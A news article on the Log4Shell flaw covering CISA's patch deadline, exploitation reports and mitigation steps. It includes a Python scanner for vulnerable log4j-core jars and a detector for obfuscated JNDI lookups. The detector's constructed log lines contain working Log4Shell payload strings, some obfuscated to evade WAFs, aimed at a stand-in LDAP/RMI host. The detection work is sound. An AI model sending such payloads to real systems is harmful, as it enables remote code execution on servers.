Log4Shell, a critical vulnerability in the open-source Apache Log4j logging library used across the Java ecosystem, has forced emergency patching across the industry, and the US Cybersecurity and Infrastructure Security Agency (CISA) has now set a hard deadline for federal agencies to fix it.
CISA (Cybersecurity and Infrastructure Security Agency) has ordered federal civilian agencies to patch systems affected by the Log4Shell vulnerability by December 24, in what is turning out to be one of the biggest security holes ever uncovered. The vulnerability, along with 12 other security issues, has been added to the agency’s catalog of known exploited vulnerabilities.
Alibaba’s Cloud Security team originally disclosed the issue to Apache on November 24. On December 9, an initial proof-of-concept exploit was published on GitHub, and the vulnerability has been extensively abused since then.
Under the schedule set out in the catalog, federal entities have ten days to determine whether their internal applications and servers use the affected Log4j library, confirm whether they are susceptible, and apply updates by December 24.
To resolve a significant vulnerability impacting the Apache Log4j software library, we’re working closely with our public and private sector partners. Threat actors are extensively exploiting this vulnerability, making it a critical task to patch: 1/2 https://t.co/utbcDZBtPv
— December 13, 2021, Cybersecurity and Infrastructure Security Agency (@CISAgov)
CISA has also set up a web page to inform the public and business sectors in the United States about the risk. Security researcher Royce Williams has compiled a list of over 300 vendors, tracking which are and are not affected by the flaw. The Dutch National Cyber Security Centre maintains a comparable list.
Patches for the Log4j library are available: the Apache Software Foundation has published an official update that addresses the vulnerability. However, because the library is embedded in so much software, often as a transitive dependency bundled inside other applications rather than something installed on its own, finding vulnerable instances and rolling out updates will be difficult.
Although the issue was discovered only days ago, it has already been described as one of the biggest security vulnerabilities ever, owing to the library’s broad use by enterprise software developers and the ease of exploitation: a single crafted string in any input that ends up being logged can lead to remote code execution, giving an attacker control of the affected system.
Attackers from China are actively seeking to exploit the weakness, according to both Microsoft and Mandiant. Microsoft also reports that nation-state groups from North Korea, Iran, and Turkey are exploiting the flaw.
Phosphorus, an Iranian threat actor, and Hafnium, a Chinese one, have both actively experimented with the vulnerability.
The number of attacks has also grown sharply. Check Point reported that exploitation attempts rose to over 40,000 by Saturday, 200,000 by Sunday, and 800,000 by Monday, touching roughly half of all corporate networks.
CISA recommends three initial measures:
1. Count the number of internet-facing Log4j endpoints.
2. Confirm that your SOC is responding to all alerts on devices that fall within the categories listed above.
3. Install a web application firewall that is updated automatically. 2/2
— December 13, 2021, Cybersecurity and Infrastructure Security Agency (@CISAgov)
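Step 1 above, enumerating where Log4j actually lives, is the hard part in practice: log4j-core is usually a transitive dependency buried inside WAR, EAR and fat jars rather than a jar anyone installed by hand. The following Python script is an added example, not CISA’s or Apache’s tooling. It walks a directory tree, opens every jar/war/ear (recursing into archives nested inside archives), reads the version from the Maven pom.properties that log4j-core ships, checks whether JndiLookup.class is present, and classifies each hit. The 2.17.0 threshold and the sample archives it builds in a temporary directory are assumptions made for the demo.

```python
"""Inventory log4j-core jars on disk, including ones nested inside WAR/EAR/fat
jars, and classify each as patched, mitigated or vulnerable.
Added example for illustration; not CISA's or Apache's tooling."""
import io
import os
import re
import sys
import tempfile
import zipfile

# Class implementing the JNDI lookup; deleting it from the jar is the documented
# stopgap mitigation for systems that cannot upgrade immediately.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside log4j-core jars; its version= line is more
# reliable than the file name, which shading or renaming can hide.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JAR_NAME_RE = re.compile(r"log4j-core-(\d+\.\d+\.\d+)\.jar$")
# Assumption for this demo: on the 2.x line, 2.17.0 and later count as patched.
# 2.15.0 was the first Log4Shell fix, but follow-on fixes moved the practical
# floor to 2.17.x; the 2.12.x/2.3.x backport lines for old JDKs are not modelled.
FIXED_VERSION = (2, 17, 0)
ARCHIVE_EXT = (".jar", ".war", ".ear")


def parse_version(text):
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_archive(zf, name):
    """Classify one open archive; returns None if it is not log4j-core itself."""
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
    if version is None:
        m = JAR_NAME_RE.search(name)
        if m:
            version = parse_version(m.group(1))
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is None and not has_jndi:
        return None
    if version is not None and version >= FIXED_VERSION:
        status = "patched"
    elif not has_jndi:
        status = "mitigated (JndiLookup.class removed; still needs upgrade)"
    else:
        status = "VULNERABLE"  # also covers unknown version with the lookup present
    return {"path": name, "version": version, "jndi_lookup_present": has_jndi,
            "status": status}


def scan_archive(zf, name, findings):
    """Inspect this archive, then recurse into any archive embedded in it."""
    hit = inspect_archive(zf, name)
    if hit:
        findings.append(hit)
    for entry in zf.namelist():
        if entry.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(entry)))
            except zipfile.BadZipFile:
                continue
            scan_archive(inner, name + "!/" + entry, findings)


def scan_tree(root):
    """Walk root and return a finding dict for every log4j-core found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                try:
                    with zipfile.ZipFile(path) as zf:
                        scan_archive(zf, path, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def _write_jar(target, version, keep_jndi):
    """Constructed sample jar holding only the entries the scanner reads."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPERTIES, "version=%s\n" % version)
        if keep_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class magic only


def build_demo_tree(root):
    """Constructed tree: an unpatched jar, a patched jar, and a WAR whose
    embedded log4j-core had JndiLookup.class stripped as a mitigation."""
    _write_jar(os.path.join(root, "log4j-core-2.13.0.jar"), "2.13.0", True)
    _write_jar(os.path.join(root, "log4j-core-2.17.1.jar"), "2.17.1", True)
    inner = io.BytesIO()
    _write_jar(inner, "2.14.1", False)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())


def run_demo():
    """Scan a constructed temp tree; returns {archive name: status}."""
    root = tempfile.mkdtemp()
    build_demo_tree(root)
    return {f["path"].replace(os.sep, "/").rsplit("/", 1)[-1]: f["status"]
            for f in scan_tree(root)}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for f in scan_tree(sys.argv[1]):
            print(f["status"], f["version"], f["path"])
    else:
        for name, status in run_demo().items():
            print(status, name)
```

Run it with a directory argument to scan a real host; without one it scans the constructed demo tree. It cannot see jars that are not on disk (fetched at runtime, or inside container images you have not pulled), and it does not look at Log4j 1.x, which is not affected by this particular vulnerability. Treat "mitigated" as a stopgap only: removing the class leaves an unpatched library in place.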
Malware and botnet operators have already taken advantage of the flaw, and ransomware gangs are expected to follow shortly.
Attacks are becoming more sophisticated, according to LunaSec, with obfuscated payloads getting past WAFs and beyond the first line of defence. The company also warns that the situation could get worse if another vulnerability emerges that strips users of whatever mitigations they have put in place.
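The WAF bypasses LunaSec describes work because Log4j resolves lookups recursively: `${${lower:j}ndi:...}`, `${${::-j}ndi:...}` and URL-encoded forms only collapse to `${jndi:...}` once the library evaluates them, so a signature that greps for the literal `${jndi:` misses them. The detection below is an added example, not LunaSec’s or CISA’s code. It applies the same normalization (URL decoding, then inside-out resolution of `lower`, `upper` and `:-` default-value lookups) before matching, and runs over a handful of constructed access-log lines using TEST-NET addresses. The lookup rules it resolves are the common ones seen in the wild, not the full Log4j lookup grammar.

```python
"""Detect Log4Shell (JNDI lookup) payloads in request/log data after undoing the
obfuscation used to slip past naive WAF signatures.
Added example for illustration; not LunaSec's or CISA's code."""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested braces: resolved first, the way Log4j does.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# What a payload looks like once obfuscation is stripped: ${jndi:<scheme>:...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.I)


def _resolve(m):
    """Apply the lookup rules attackers lean on; leave unknown lookups as-is."""
    body = m.group(1)
    if ":-" in body:                       # ${anything:-default} -> default
        return body.rsplit(":-", 1)[1]
    kind, sep, rest = body.partition(":")
    if sep and kind.strip().lower() == "lower":
        return rest.lower()
    if sep and kind.strip().lower() == "upper":
        return rest.upper()
    return m.group(0)                      # e.g. ${jndi:...} itself stays put


def normalize(text, max_rounds=20):
    """URL-decode (repeatedly) then resolve nested lookups inside-out until the
    string stops changing; max_rounds bounds pathological input."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def detect(line):
    """Return whether a JNDI lookup is present, the scheme it targets, and the
    normalized form an analyst should look at."""
    norm = normalize(line)
    m = JNDI.search(norm)
    return {"jndi": bool(m), "scheme": m.group(1).lower() if m else None,
            "normalized": norm}


def scan(lines):
    hits = []
    for line in lines:
        f = detect(line)
        if f["jndi"]:
            f["line"] = line
            hits.append(f)
    return hits


# Constructed access-log lines (TEST-NET-2 addresses). The first five carry
# payload variants of the kind seen once the PoC was public; the last is benign.
LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [12/Dec/2021:10:01:05 +0000] "GET /?x=${${lower:j}ndi:'
    '${lower:l}dap://198.51.100.7/b} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.7 - - [12/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '10.0.0.8 - - [12/Dec/2021:10:01:12 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F'
    '198.51.100.7%2Fd%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi${env:NOPE:-:}${upper:d}ns://198.51.100.7/e}"',
    '10.0.0.10 - - [12/Dec/2021:10:01:20 +0000] "GET /index.html HTTP/1.1" 200 '
    '4096 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print("JNDI via %-4s  %s" % (hit["scheme"], hit["normalized"]))
```

Log the normalized string next to the raw line so analysts see what the library would actually have evaluated. The limits matter: an attacker can use lookups this normalizer does not model, so any `${` that survives normalization in request data is itself worth an alert, and detection of this kind buys time for patching rather than replacing it.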
When he’s not writing/editing/shooting/hosting all things tech, he streams himself racing virtual vehicles. Yadullah may be reached at [email protected], or you can follow him on Instagram or Twitter.